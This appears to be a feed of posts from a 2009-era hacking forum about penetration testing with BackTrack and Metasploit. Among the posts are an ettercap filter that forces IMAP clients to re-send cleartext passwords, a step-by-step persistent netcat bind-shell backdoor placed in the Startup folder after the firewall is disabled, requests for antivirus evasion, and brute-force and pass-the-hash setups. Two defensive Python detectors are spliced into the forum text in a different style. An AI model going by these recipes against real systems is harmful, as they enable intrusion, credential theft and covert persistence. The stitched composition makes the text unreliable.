22:07
»
remote-exploit
So I have BT4 running in a Virtual Machine, and I have Windows 7 as the host computer. I'm trying to write my own Buffer Overflow exploit for an old, vulnerable, version of 3COM FTP, but I'm stuck. I figured out which bytes overwrite the EIP, but I can't figure out where to go from here. I can't find a register that points back into my buffer.
-
-
10:33
»
remote-exploit
I've been trying to access milw0rm lately and it's been down for a while now. After googling around I found some blogs saying that milw0rm was going down but those were dated back to July this year. So does anyone know what exactly happened to milw0rm and if someone managed to grab the latest exploit database from it?
-
-
16:08
»
remote-exploit
Hi guys,
As long as I was misinterpreted on my LinuxQuestions.org post:
http://www.linuxquestions.org/questions/linux-newbie-8/linux-console-screenshot-command-760837/#post3713800
I come to you open-minded people!
A friend has a question about the Linux console (non-Graphical) environment.
In fact, he is running a wireless cracking tool, and needs to evidence not only the final output but the actual pace of the crack, like number of beacons on different periods of time, etc...
For me, the best way to do this is by taking screenshots.
But from the shell?
Is it possible to do that without X?
Thanks in advance!
sl33p
-
0:56
»
remote-exploit
Today I came across a problem that I haven't encountered before, a very small installation of users with passphrases that aren't in the standard (smallish) dictionary I use initially during my tests. Operating on a limited time constraint meant I couldn't run my larger ones through, and I had to find another way.
I spent some time auditing the network to find nothing exploitable that didn't require a login, and no extraneous data floating around that I could use.
On a whim I was ettercap'ing one of the XP desktops and watching the packet traces, gaining further information about the system (Symantec Updates in operation etc.) when I noticed some IMAP traffic going to the mail server, unencrypted.
Thinking about it for a bit, I began to bet that the IMAP program would log me in - if only I could get it to send the password again. I wrote an ettercap filter to replace the IMAP "IDLE" string, with "LOGOUT" and loaded it up, and made sure I had tcpdump logging all my traffic.
A couple of msg("Logged out")'s later, and I went to find my packet dump - to discover a base64 encoded string just after the SYN/SYN+ACK/ACK combination that occurs immediately after the LOGOUT closes, and voila: a username and password.
The moral of this long winded story is you should ALWAYS use secure methods of connection - even on internal-behind-the-dmz protected hosts. Properly saved and stored SSL certificates and Kerberos authentication are strongly recommended.
The ettercap filter:
Code:
if (ip.proto == TCP && tcp.dst == 143) {
    if (search(DATA.data, "IDLE")) {
        replace("IDLE", "LOGOUT");
        msg("Logged out");
    }
}
To get to the correct password (which was, to be fair, in another of my dictionaries) would have taken me approximately 34 hours.
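The exposure in the post above is that a forced LOGOUT makes the client reconnect and authenticate again in cleartext on port 143. As an added example (not code from the post), this per-connection parser for client-to-server IMAP lines flags LOGIN and AUTHENTICATE PLAIN sent before STARTTLS, reporting only the username; the capture records and connection ids are constructed.

```python
"""Flag IMAP credentials that cross the wire in cleartext.

Added example: a small per-connection parser for the client-to-server side of
port 143 sessions. It reports LOGIN and AUTHENTICATE PLAIN commands sent before
STARTTLS. The password part of a PLAIN blob is deliberately never extracted, so
findings can be logged safely.
"""
import base64
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    conn: str      # connection id from the capture (constructed label)
    line_no: int   # index of the offending line within that connection
    method: str    # "LOGIN" or "AUTHENTICATE PLAIN"
    username: str


def plain_authcid(blob: str) -> str:
    """Return the authentication identity from a SASL PLAIN blob.

    PLAIN is base64(authzid NUL authcid NUL password); only the authcid
    is returned, the password field is discarded.
    """
    try:
        raw = base64.b64decode(blob, validate=True)
    except (ValueError, TypeError):
        return "<undecodable>"
    fields = raw.split(b"\x00")
    if len(fields) != 3:
        return "<malformed>"
    return fields[1].decode("utf-8", errors="replace")


def scan_capture(records):
    """records: iterable of (conn_id, client_line) pairs in capture order.

    Returns the list of Finding objects for credentials sent unprotected.
    """
    tls_done = {}        # conn_id -> True once STARTTLS was issued
    awaiting_blob = {}   # conn_id -> line_no of an AUTHENTICATE PLAIN awaiting data
    counters = {}        # conn_id -> client lines seen so far
    findings = []
    for conn, line in records:
        counters[conn] = counters.get(conn, 0) + 1
        no = counters[conn]
        line = line.rstrip("\r\n")
        if tls_done.get(conn):
            continue  # everything after STARTTLS is ciphertext on the wire
        if conn in awaiting_blob:
            # continuation line: the client answers the server's "+ " with the blob
            findings.append(Finding(conn, awaiting_blob.pop(conn),
                                    "AUTHENTICATE PLAIN", plain_authcid(line)))
            continue
        parts = line.split(maxsplit=3)   # tag, command, arguments...
        if len(parts) < 2:
            continue
        cmd = parts[1].upper()
        if cmd == "STARTTLS":
            tls_done[conn] = True
        elif cmd == "LOGIN" and len(parts) >= 3:
            findings.append(Finding(conn, no, "LOGIN", parts[2].strip('"')))
        elif cmd == "AUTHENTICATE" and len(parts) >= 3 and parts[2].upper() == "PLAIN":
            if len(parts) == 4:          # SASL-IR form: blob on the same line
                findings.append(Finding(conn, no, "AUTHENTICATE PLAIN",
                                        plain_authcid(parts[3])))
            else:
                awaiting_blob[conn] = no
    return findings


# Constructed sample: c2 is the reconnect after the forced LOGOUT and
# re-authenticates in the clear; c3 upgrades to TLS first, so its LOGIN is
# never visible on the wire and must not be flagged; c4 is a plain LOGIN.
SAMPLE_CAPTURE = [
    ("c1", "a1 CAPABILITY\r\n"),
    ("c1", "a2 IDLE\r\n"),               # rewritten to LOGOUT by the filter above
    ("c2", "a1 AUTHENTICATE PLAIN\r\n"),
    ("c2", "AGFsaWNlAHNlY3JldA==\r\n"),  # base64 of NUL "alice" NUL "secret"
    ("c2", "a2 SELECT INBOX\r\n"),
    ("c3", "a1 STARTTLS\r\n"),
    ("c3", "a2 LOGIN bob hunter2\r\n"),  # would be encrypted in a real capture
    ("c4", 'a1 LOGIN "carol" "pw"\r\n'),
]

if __name__ == "__main__":
    for f in scan_capture(SAMPLE_CAPTURE):
        print(f"{f.conn} line {f.line_no}: cleartext {f.method} for user {f.username!r}")
```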
-
-
12:43
»
remote-exploit
I have recently found that McAfee Enterprise 8 detects the MSF binary payload windows/shell/reverse_tcp (being the skinny version of windows/shell_reverse_tcp). It also does not matter if you encode it with the excellent shikata_ga_nai encoder with as many iterations as you like it still finds it. McAfee doesn't report the payload correctly but enough to delete the file (if that's the McAfee policy). :mad:
Does anyone have any ideas or suggestions using the MSF framework to counter this detection other than using an external payload encrypter or a handcrafted XOR stub?
- Nasher
-
-
10:05
»
remote-exploit
How do I connect to a telnet server
through a proxy or SOCKS?
Is it possible with connect relay?
I'm trying various SOCKS proxies with PuTTY but without success.
Is it possible with i2p? I also created a tunnel but without success too.
Thanks in advance.
-
-
5:35
»
remote-exploit
On updating Metasploit 3.3dev in Ubuntu I get 320 exploits and it reports it is at revision 7131, but on BT4 it updates and shows 413 exploits and 266 payloads.
Why is there a difference then?
The svn info on both OSes is different. How do I get all the exploits in Ubuntu?
svn info on BT4 :
Path: .
URL:
[metasploit.com]
Repository Root:
[metasploit.com]
Repository UUID: 4d416f70-5f16-0410-b530-b9f4589650da
Revision: 7131
Node Kind: directory
Schedule: normal
Last Changed Author: druid
Last Changed Rev: 6193
Last Changed Date: 2009-01-28 11:43:47 +0530 (Wed, 28 Jan 2009)
svn info on Ubuntu 9.04:
Path: .
URL:
[https:]]
Repository Root:
[https:]]
Repository UUID: 4d416f70-5f16-0410-b530-b9f4589650da
Revision: 7131
Node Kind: directory
Schedule: normal
Last Changed Author: kris
Last Changed Rev: 7131
Last Changed Date: 2009-10-06 11:09:05 +0530 (Tue, 06 Oct 2009)
-
-
12:07
»
remote-exploit
I'm part of a student group that is attempting to get together a hack - defend game [probably a CTF type].
What I was looking for was if anyone was aware of a "Hacking Experience Quiz," or basically "What do you know?". I've done some Google searches and found very little, mostly "Hacking Challenges" [like hackthissite]. Our goal is to rank the members, so that we could offer tutorials by level.
I was also hoping that someone might have some experience with this. There are a lot of beginners and we would like to work our way up in difficulty. Do you have any advice on how to design the actual Challenges, or are you aware of any OS distributions designed for that? I did find de-ice.net, but none of the links seem to be working.
I was thinking that the easiest way to do this is like rootthisbox.org rather than the way DefCon does it. In other words, have a file in a web-accessible folder, that is polled every five minutes and the team name in that file will receive x amount of points. Any other ideas about points?
Thanks guys for your help!!
-
-
2:47
»
remote-exploit
I'm on a network where all the traffic passes through a Squid proxy out to the network, i.e. all outgoing traffic is through port 3128, and the proxy is set up in such a way that no intra-LAN communication is allowed. So if one manages to deploy a binary payload of reverse TCP meterpreter, the connection still won't be established since the proxy will kill the connection (I know this can be easily overcome by enabling the option of bypassing the proxy for computers on the same network, but I don't have physical access to any of the computers). So is there a way that meterpreter will bypass the proxy and directly communicate with the exploit handler?
-
-
20:54
»
remote-exploit
Hi all,
I've got a question here.
Does Metasploit work on a wireless network? I have tried to exploit one of my laptops connected to wireless with Windows XP installed on it. I tried to exploit it with Metasploit using an ms08 exploit and a meterpreter payload, but when I type exploit, Metasploit doesn't seem to be able to exploit that system: it says the exploit was successful but no session was created. Is this a problem with the wrong payload, or can Metasploit not be used on a wireless network?
-
11:02
»
remote-exploit
Hi there,
I am learning about penetration testing. I have set up a Windows Server 2003 R2 Enterprise virtual machine.
It is relatively unpatched (vulnerable to ms08-067), no antivirus, Windows firewall. After a Nessus scan a few of these vulnerabilities were shown.
When I use fast-track.py to exploit this vulnerability (ms08-067) I immediately get a shell running as SYSTEM. However, I would like to use meterpreter for all of its features rather than a simple netcat of cmd.exe, and fast-track provides no way to change the payload.
So I try to exploit the machine using Metasploit, using the appropriate settings, using exploit ms08_067_netapi with windows/meterpreter/bind_tcp OR reverse_tcp OR a simple bind shell (to test); however I get the following error:
Code:
Exploit target:
Id Name
-- ----
9 Windows 2003 SP2 English (NX)
msf exploit(ms08_067_netapi) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[-] Exploit failed: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)
[*] Exploit completed, but no session was created.
OR when trying to use SRVSVC:
Code:
Exploit target:
Id Name
-- ----
9 Windows 2003 SP2 English (NX)
msf exploit(ms08_067_netapi) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[*] Exploit completed, but no session was created.
When setting the target manually the exploit also fails as it cannot determine the language pack!
Please could somebody shed some light on this issue? Is the Metasploit exploit working correctly on R2? (Latest SVN)
Thanks,
Joe
-
8:23
»
remote-exploit
Has anyone else noticed nmap doing false positives on port 21?
Just about every IP I scanned during my current job came up positive, but when I try to connect with an FTP client it's closed. Also OpenVAS doesn't show it as open (although scanline from Foundstone does).
Anyone know if this is just me or not?
Thanks
-
5:44
»
remote-exploit
Hello! Well, my question is primarily as the topic says: why is there a "low" success rate on the SMB2 exploit (the Metasploit version)? More specifically, in technical terms... Or is it unknown why?
I find it weird since I have tried this exploit on two stations, one Vista and one Windows 7, and the results are different every time... Just keep spamming and it will eventually work... If the box is unlucky...
-
-
17:08
»
remote-exploit
Dear
I need your help. I would like to do an audit of our network, and I wish to do a pen test on some servers running Windows and Unix or Linux OS and other equipment like Cisco routers and switches.
Could you please help with what I can do for that? I know I can use Nmap for testing ports and Nessus for Unix, but are there any other tools like LANGFI? What free tool can help me do auditing for our Cisco switches and routers?
And can anyone let me know how I can use Metasploit to get a Linux or HP-UX system without a root user?
Best regards & thank you in advance
-
-
5:04
»
remote-exploit
I'm on a network which has all traffic forwarded to the internet via a Squid proxy, i.e. port 3128. I tried running sslstrip but it fails, raising several errors. So has anyone ever got sslstrip to work under such a network topology?
I'm guessing sslstrip only works on port 80 or 443? Please let me know if anyone has got it working.
-
-
18:00
»
remote-exploit
I am pen testing from my laptop to my PC (Windows XP SP2). I watched and read some tutorials on how to penetrate an XP box and followed the directions. I even opened the required ports/disabled the firewall/forwarded ports/AV; however, when running autopwn no sessions are connected ;/
I am starting to think it's not the remote box (my XP) but rather the configuration on my laptop which has BT4 installed... could it be?? I updated fast-track etc. as well. I could be wrong, but then I'm the noob here asking for help =O
Note: on boot the dhcp3 server doesn't start >_<... just thought I'd mention it in case it might be a problem.
-
-
8:32
»
remote-exploit
***EDITED*** I read through a lot of Metasploit tutorials/concepts so I have a pretty good idea of what I'm going for.
I'm trying to do two different things.
1. Gain remote access to a Vista pc in the same LAN as me.
2. Gain access to my friends Server (Running Server 2003) over a WAN.
Can Metasploit help me gain access to both these machines?
-
-
1:13
»
remote-exploit
Hey guys,
I tried pulling an exploit off milw0rm - Mozilla Firefox 3.5 Heap Spray Exploit to be exact - and I've gone ahead and set it up running. It tells me to have someone connect on port 80 but when I do, nothing happens. Firefox just says "Failed to establish a connection".
I've checked nmap and the port does open, so it appears the exploit is trying to do its job. Tcpdump also shows there is an attempt at a connection of some sort.
Mozilla Firefox 3.5 (Font tags) Remote Heap Spray Exploit <-- Link to the exploit I'm trying to use.
Results from konsole:
Listening on port 80.
Have someone connect to you.
Type <control>-c to exit..
Any idea what's not working here? If you need any more info to be able to help me, let me know and I'll be glad to share.
Thanks in advance,
Wolf
-
-
12:48
»
remote-exploit
Hello people.
I was wondering if some of you have some literature/links to share about evading firewalls, excluding techniques such as reverse shells where social engineering is needed, as the user has to execute the binary that establishes the connection.
Thank you!
-
-
23:36
»
remote-exploit
I am working on a project to crack fixed PINs on a Bluetooth device. I was wondering if it is possible to enter more than 1 PIN per second? Does anyone have any info on the delay of the pairing process? Thanks.
-
-
3:05
»
remote-exploit
This module exploits a stack overflow flaw in the Microsoft IIS FTP service. The flaw is triggered when a special NLST argument is passed while the session has changed into a long directory path. For this exploit to work, the FTP server must be configured to allow write access to the file system (either anonymously or in conjunction with a real account) This exploit module was written by Kingcope (kcope2@googlemail.com) and hdm (hdm@metasploit.com)
Home Page:
4xsecurityteam.blogspot.com
4xunderground.blogspot.com
vimeo.com/channels/4xsecurityteam
-
-
4:52
»
remote-exploit
Hi, friend
This exploits a buffer overflow in the LDAP service that is part of the SIDVault product.
Home Page:
4xsecurityteam.blogspot.com
4xunderground.blogspot.com
vimeo.com/channels/4xsecurityteam
Thanks
References:
milw0rm.com/exploits/9586
milw0rm.com/exploits/9592
milw0rm.com/exploits/9596
-
2:38
»
remote-exploit
A quick method to create a custom wordlist for your target. Enjoy.
PaulDotCom: Archives
-
-
20:00
»
remote-exploit
Is there a way that after you gain access to a box to change its language?
Say you have TS access, and it's in French or Chinese or something. Can you run a command to change it to English?
I guess I could just build it in my lab, but figured someone here probably knows a trick.
Thanks in advance.
Edit:
Someone will probably ask. Question is for Linux and Windows primarily, but if you know a trick for some other OS, please post it. Thanks.
-
-
9:24
»
remote-exploit
Consider this scenario,
there are two hosts in the LAN. One is an FTP server and it has some interesting data which can be gained with the right FTP access; let's say it's a well secured Linux based OS. The other is an XP office box, and the attacker gained access and admin privileges on it remotely, controlling the host through the router that separates the LAN and the outer world.
The main idea, from the attacker's point of view, is to install an 'attacker controlled honeypot' on the XP box that is going to imitate the FTP server on the first box.
So, if the attacker succeeds in fooling the gateway to redirect all traffic intended for the victim (real FTP server box) to his pwnd XP box, the FTP users will end up connecting to the box pwnd by the remote attacker and give their username and pass to the 'attacker controlled honeypot'.
I'm trying to make this setup in my virtual environment. There are a few things I'm not familiar with, and I will appreciate some tips. The 'honeypot' that has to be planted on the XP box could be a small program like, let's say, netcat, and then its output could be redirected wherever I want, but the honeypot's appearing screen should be like the FTP server screen, so I need some kind of 'honeypot like', easy to set up small program, or something like an msf module (if somebody has written something like this).
The other way, which is probably the right way, is to write a small program,
programming winsock to act like an FTP server, store the data, exit on storing the pass buffer and stop the ARP spoofing process, so that the FTP user will be disconnected. And when he tries to connect again he will be redirected, I hope, to the real FTP server.
I must say that for now I don't have so much time for going into winsock programming.
So if there is some kind of honeypot right for this purpose...
I hope that my scenario makes some sense, 'cause if I had time for going through it I would put it in my final exam at my university.
Every opinion on this is welcome.
-
4:39
»
remote-exploit
Hi, I'm new to the forums and I figured out how to crack the PIN when the devices are pairing, but is it possible to crack a fixed PIN? I need some advice on building a brute force PIN cracker. I have done some research and found a PIN manager program called bluez pin; the script for the program is at t2-project.org. I want to know if there is any way of implementing the brute force PIN cracker into this program. I also found a program called Brutus and was wondering if anyone can help me configure it to work with Bluetooth. Thanks.
-
-
0:17
»
remote-exploit
What do you use for your pen tests? Why?
I use:
G++, I use C/C++ as my scripting language :p
KlocWork, Code Auditing, fast, awesome, need I say more?
IDA Pro, For when automated scanning and fuzzing fail.
NASM, Assembler, Nice Syntax, great for rapidly making Shellcode
Firefox, With all the addons, it serves as a great preliminary tool for attacking Web apps.
Nmap, The OS scanning, oh and the fact that I'm too lazy to write my own :p
Nessus, scans a lot, fast, way more than I can manually.
Maltego, Information gathering has never been easier, seriously
Wireshark, Some things I really don't wanna do in the terminal, sifting through 5000 packets is one of them.
BurpSuite, Web applications are fun sometimes.
Metasploit, meterpreter, end of.
Aircrack-ng, too lazy to rewrite this stuff.
Now for my personal tools:
InjecTi: A packet injector that I use in scripts that can ALMOST replace any tool imaginable; it is modular as well.
Crackit: A modular password cracker, only over TCP atm, but could be run over almost anything else. Uses keywords such as DEC, SEND, REC, ADD, CUT, TRY to control the flow of the program in a dynamic fashion.
Kat: A remake of netcat, with banner grabbing and other goodies built in.
Snarfit: A modular data snarfer that you feed input into and it feeds out what you want; used for things such as parsing large logs for IPs, and spitting the EXIF data out of hundreds of photos at once.
HarDoS: A Collection of DoS tools including ones to defeat syn cookies, DoS wireless connections, and use well known attacks such as the Smurf attack.
Cubbyhole: Two rootkits to rule them, one man to bind them. One for *dows and one for *nix.
-
-
12:17
»
remote-exploit
Has anybody had success in opening/viewing MTF files received after a successful exploitation of the Veritas backup file download vulnerability using Metasploit? (Bugtraq 14551). The files received are in 'MTF' (Microsoft Tape Format), which is supposed to be extractable by the NTKBUp program. I am not getting this to work. I have also downloaded an MTF reader for Linux from Tucows and this software cannot read the files either. Any ideas?
-
1:41
»
remote-exploit
Hi,
I am having trouble configuring samba to work with a pass the hash attack. Was wondering if anyone would be able to lead me in the right direction with this one?
I have done (in order):
downloaded samba 3.0.22
patched the appropriate files
configured samba (--with-smbmount)
make + make install
add the hash to the SMBHASH env variable with export
When I do the following:
./smbmount //target/drive /mnt/target -o username=target-user
I receive this error:
params.c:OpenConfFile() - Unable to open configuration file "/usr/local/samba/lib/smb.conf":
No such file or directory
Can't load /usr/local/samba/lib/smb.conf - run testparm to debug it
Password:
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied LM HASH...
16526: session setup failed: ERRDOS - ERRnoaccess (Access denied.)
SMB connection failed
This is interesting because the smb.conf file is in /etc/samba and not in /usr/.../samba/. So I was wondering if anyone knew how to redirect samba to look in /etc/samba. I don't know if it matters but it should be noted that /etc/smb.conf existed before I installed samba 3.0.22 (was on default install of bt4).
Also, when I create a mount point (mkdir /mnt/target) and try and mount it (mount /mnt/target) I receive the following error:
mount: can't find /mnt/target/ in /etc/fstab or /etc/mtab
Any ideas on this would be appreciated.
Thanks.
-
-
22:22
»
remote-exploit
Was wondering if anyone knows if there is exploit code in the wild for ms09-039 (CVE-2009-1923; CVE-2009-1924 )?
I have checked Packetstorm, milw0rm, SecWatch, and SecuriTeam -- without luck.
I should also ask while I'm here if anyone knows of any other good exploit resources?
-
-
22:51
»
remote-exploit
Hi
Using Metasploit on the LAN works like a dream:D
For example, has anyone used it over a WAN, the attacker using a private range IP (NAT), the attacked system using a public IP?
Let's say to open a command prompt on the remote / attacked system?
Can someone share some knowledge on this subject
Thank you:cool:
-
14:23
»
remote-exploit
Gentlemen,
I am working in a remote supervision procedure. Basically, the steps are:
1.- Pop a box using meterpreter
2.- Upload a packed VNC backdoor, modify registry accordingly
3.- Sit and watch the remote desktop
(Meterpreter built-in VNC seems to run at very slow frame rates, however this is a LAN exercise)
I do know how to get the shell, prepare the backdoor, set registry changes, create a firewall rule to allow the executable ...
Now, I want it to be undetectable from AV's. Again, I know how to do this for a particular AV by hex modifying the program, as per
Defeating Virus Signatures
or by just compressing it.
Do any of you know a (simpler) method to hide an executable from most AV's in one shot?
Killing the AV is not an option here.
For the suspicious minds, I own a security company and I was born in the 60s. What I intend here is to show some clients (non technical profiles) why they should invest in security by using a real world example.
That's why I don't want to go through the tedious hiding process for each and every AV they may use.
Thanks.
-
-
11:17
»
remote-exploit
I managed to make my first backdoor.
Lab: Attacker: Dell Inspiron 1525 laptop, USB BackTrack 4 prefinal
Victim: VirtualBox Windows XP SP2 Home Edition under Linux Ubuntu 9.04.
I think these steps are easy, so anyone who started working with BT as I did a few months ago can try this to see in general how a persistent backdoor works.
First I run Metasploit and exploit smb/ms08_067_netapi with payload windows/meterpreter/reverse_tcp.
After I get an active session, I first disable the firewall with Carlos Perez's script.
Then I upload the file nc.exe to C:\ (or any directory you want) and a batch file named test.bat, which I previously made in Notepad run in Wine, which I upload to the Startup folder of the victim machine.
Test.bat had this in the file: start C:\nc.exe -L -p 5555 -d -e cmd.exe
After I do this and reboot the machine, my backdoor always listens on port 5555 (or you can put some other port), and every time the machine starts you can see for one second a black cmd screen which starts the listener on port 5555.
Then just type on the attack machine: nc (ip of target) 5555 and you will get a reverse shell.
It's far from an ideal backdoor and has many drawbacks, but I think it's a nice way to start to see how backdoors work in general.
If someone has any suggestions (I didn't manage to bypass the firewall without disabling it with the Ruby script first) or something like that, or someone who will try this can ask me here and I will help him to make the same thing as me.
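The persistence described in this post (a batch file in the Startup folder that launches a netcat listener bound to cmd.exe) is easy to spot from the defender's side. The following added example, not part of the original post, scans the contents of Startup-folder scripts for that pattern; the file contents are constructed sample data, and the file names and the `scan_startup` function are assumptions made for the example.

```python
import re
from typing import Dict, List

# Constructed sample: contents of files found in a Windows Startup folder.
# test.bat mirrors the batch file described in the post; the others are benign.
STARTUP_FILES: Dict[str, str] = {
    "test.bat": "start C:\\nc.exe -L -p 5555 -d -e cmd.exe\r\n",
    "sync.bat": "@echo off\r\nxcopy /s /y D:\\docs \\\\fileserver\\backup\r\n",
    "readme.txt": "nothing to see here\r\n",
}

# Netcat-family binaries and the switches that turn them into a shell listener:
# -l/-L listen (-L = re-listen after disconnect), -e program to attach, -p port.
NC_NAMES = re.compile(r"\b(nc|ncat|netcat|nc64)\.exe\b", re.IGNORECASE)
LISTEN = re.compile(r"(?<!\S)-[lL](?!\S)")
EXEC = re.compile(r"(?<!\S)-e\s+\S*(cmd|powershell)", re.IGNORECASE)
PORT = re.compile(r"(?<!\S)-p\s+(\d{1,5})")
SCRIPT_EXT = (".bat", ".cmd", ".vbs", ".ps1")


def scan_startup(files: Dict[str, str]) -> List[dict]:
    """Return one finding per script line that launches a netcat shell listener."""
    findings: List[dict] = []
    for name, content in files.items():
        if not name.lower().endswith(SCRIPT_EXT):
            continue  # only autorun script types are interesting here
        for lineno, line in enumerate(content.splitlines(), 1):
            # all three traits together distinguish a bind shell from a plain
            # netcat file transfer or connectivity check
            if NC_NAMES.search(line) and LISTEN.search(line) and EXEC.search(line):
                port = PORT.search(line)
                findings.append({
                    "file": name,
                    "line": lineno,
                    "port": int(port.group(1)) if port else None,
                    "text": line.strip(),
                })
    return findings


if __name__ == "__main__":
    for hit in scan_startup(STARTUP_FILES):
        print(f"[!] {hit['file']}:{hit['line']} listener on port {hit['port']}: {hit['text']}")
```

On a live host the same check pairs naturally with a review of listening ports and the firewall state, since the post notes the firewall had to be disabled for the listener to be reachable.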
-
-
11:36
»
remote-exploit
Is there a way to crack a login.php form? I have successfully cracked a login.asp with simple SQL injection, but this login.php is giving me trouble. A little push in the right direction would be helpful.
-
-
13:29
»
remote-exploit
I've been redirected and you are able to see the Thread right here:...[Oh, f***. Totally forgot about the rule]. What a literally STUPID rule to let users only post links after having reached 15 posts. That being said, let's continue.
MISSION: Let JTR pipe its live-generated 8-character passwords into Aircrack-ng while being able to use JTR's resume-from-previous-state function.
For further information on directly piping output of JTR into Aircrack, please refer to the following documentation entry: [ask me if you need the link].
Conclusions I've drawn so far: First of all, the documentation of JTR is a total mess. Seriously.
Secondly, it doesn't make much sense to set bruting mode to the full length from 8 to 63 characters. For the sake of analysis, 8 chars will do.
* In john.conf, incremental mode has to look somewhat like this:
Code:
[Incremental:Alpha]
File = $JOHN/alpha.chr
MinLen = 8
MaxLen = 8
CharCount = 26
The corresponding command to launch the rocket will probably look like this (NOTE: The following command must be run in JTR's path):
Code:
john --incremental:alpha --stdout | aircrack-ng -0 00:14:6C:7E:40:80 -w- *psk.cap
Put in simple words: In the above code JTR uses all lowercase letters as input and pipes them into Aircrack-ng. Option -0 brings some colour into the world.
Even if you only have ONE network specified in your captured file (which should be the case since you are working on your own network, right?), Aircrack-ng asks for an ESSID (option -e/--essid) and/or BSSID (option -b/--bssid). With "-w-" (without quotes) Aircrack-ng knows that it gets its input from another program: JTR.
Further questions to the above:
* Let's take another look at john.conf: Is the CharCount still correct when changing MinLen to "8"?
* JTR seems to use its dictionaries in the cracking process.
(Therefore, the code needs to be changed so that JTR tries EVERY single combination possible with 8 characters without touching any dictionary.)
* JTR saves its progress by default, but how exactly is it possible to resume a stopped session in combination of Aircrack-ng?
If anyone of you knows an answer to the above questions: I'm all ears. Thanks for participating, guys.
-$p!c3-
-
-
10:02
»
remote-exploit
Hello!
This may be a very dumb question to ask, but I find it interesting.
And I'm sure that a lot of others that are new to this will too.
I haven't worked with Metasploit a lot. So I decided to install a virtual Vista SP1 machine and check it out and play around with Meterpreter. Once it was done I installed AVG Free and didn't install any updates. I started my virtual BT4, and got to thinking: now what?
I have to run an exploit against a vulnerability on the Vista machine; the only problem is that I don't know of any specifically that is part of the Metasploit exploit arsenal.
My question straight out is: how do we make a Vista machine (or XP, for the sake of other users searching the forum for this) vulnerable in the least time-consuming way possible?
-
-
7:26
»
remote-exploit
Recently I tried the soundrecorder.rb script by Carlos Perez and it is a really cool thing.
After the remote keysniffer, a really nice thing.
My lab: on one computer BackTrack 4 prefinal on USB, and on another Windows XP SP3.
I run the exploit windows/browser/winamp_playlist_unc, an old exploit for Winamp 5.12, but I like to launch this exploit with the payload windows/meterpreter/reverse_tcp.
After the session becomes active, I first migrate quickly to the explorer.exe process.
Then I run the soundrecorder.rb script and talk into the mic on the victim computer, and the attacker computer records everything. Really nice; also nice is that after the recording time is over, the script automatically deletes the uploaded files linco.exe and oggenc.exe.
Can someone else say something about this nice script and their experience with it?
-
-
7:47
»
remote-exploit
This is my first post to this forum, so hello.
I am currently "pentesting" my website, trying to hack into it. Social engineering myself is cheating, as is social engineering my boss, so social engineering is out (except for social engineering the web hosting company, but that is something that I would like to avoid (I could "cheat" and make it very easy due to my knowledge as a web admin for the site. I will do it as a last resort, but I would rather learn something new)).
If grabbing a banner using ncat fails to reveal service types, versions, and anything else, and nmap only gives a 90% secure guess on the operating system type without reliable version information, and nothing on the version of the ftp, [http,] smtp, etc. services running on various ports, but is still able to get the type of service running on a given open port, is there any other way for me to find out the versions my website/webhost is running?
Thanks to any responders in advance.
-
0:53
»
remote-exploit
Hi, I've been thinking for a while of a situation where you are trying to access a network, and you connect a device to the telephone lines and act as a MITM.
In my area most people have ADSL2 and use PPPoA or PPPoE, and you can get broadband PCI cards, which you should be able to bridge. If I remember correctly, Wireshark has the ability to read the packets.
Q1) Has anyone got a PCI broadband card, and what does it allow you to do?
Q2) What type of attack vectors will it open up (same as LAN or more)?
Q3) With the authentication of PPP, does that allow you to decode packets? (Looked on Google, but apart from the makeup, it doesn't tell much about the type of packets on the wire.)
Q4) Would it allow injection? Would you need it to authenticate with you, and then you with the ISP?
Q5) Can you use a network card RJ45 if you connect the two phone wires (the 2 middle ones in this country, default) to 2 and 5 on an RJ45 socket?
If it's possible, some three clamps connected to the two wires should allow quick connection to data out of the network, minus encrypted traffic.
Would this be a powerful attack? You don't need to guess DNS numbers, and web traffic is in the clear. Downsides would probably be VPNs.
Any thoughts or ideas?
Cheers
-
-
15:15
»
remote-exploit
Hi,
[Sorry for my bad english ....]
I installed an FTP server on IIS 6, configured the anonymous user with R/W permissions, and stopped the HTTP service.
I open an FTP connection to 192.168.1.100 in anonymous mode and try to write/copy a file inside, and it works.
So I think it's an easy way to put nc.exe on the FTP server root.
I create the connection as below:
Code:
C:\>echo OPEN 192.168.0.100 >> ftp.txt
echo OPEN 192.168.0.100 >> ftp.txt
C:\>echo ....
........
.......
echo bye >> ftp.txt
....
C:\>ftp -A -s:ftp.txt
I use the Windows FTP.exe command because it supports the "-s" option.
This means: run ftp.exe and execute the instructions inside ftp.txt.
I browse the FTP directory from Firefox and I find nc.exe in the directory.
Double click...
I can save nc.exe into my root, but I can't run nc.exe or receive an interactive shell.
It's right because FTP works in UDP mode on port 20 and FTP is a non-interactive program.
I tried using Fast-Track in web GUI mode: ./fast-track -g
I read the official wiki and watched the movies. (No movie about "Binary to Hex", unfortunately.)
I'm interested in the "Binary to Hex Payload Generator".
I start Fast-Track in web GUI mode at localhost:4444.
The Fast-Track guide at localhost:44444/binaryconvert explains that the payload size must be less than 64K.
I respect this; in fact nc.exe is about 59K.
I convert nc.exe into payload.exe.
By default it's saved at --> /pentest/exploit/fasstrack/payload.exe
Another point of the guide is "...and puts it into the right format to echo onto the operating system."
So I think the right method is exe-to-bat conversion.
I convert payload.exe with wine exe2bat into nc.txt.
I copy the code lines inside nc.txt. The code is in echo mode, I suppose...
I open ftp 192.168.1.100 again.
From the FTP shell I paste the nc.txt content.
I can't receive an interactive shell.
I'm sure I'm missing something or following the wrong way.
Thanks in advance.
MALAM
-
10:03
»
remote-exploit
I'm testing MITM against my dummy computer.
I get dsniff, arpspoof, fragrouter, and dnsspoof running, but when I run webmitm it lets me create the certificate, and then it just gives me the error
webmitm: bind: Address already in use
What am I doing wrong? I googled it like crazy, but only a few pages showed up and none of them had any kind of solution. Could it be because of anything that I already have running, whether it's part of the MITM attack or not (i.e. Firefox, or having mapped SMB locations, Pidgin)?
I've tried deleting the certificate and starting over. I also tried entering different info into the certificate.
Any help would be appreciated. Thank you.
-
-
14:44
»
remote-exploit
Hey guys,
I think most of you know the XSSShell project:
XSS Shell, backdooring the web....
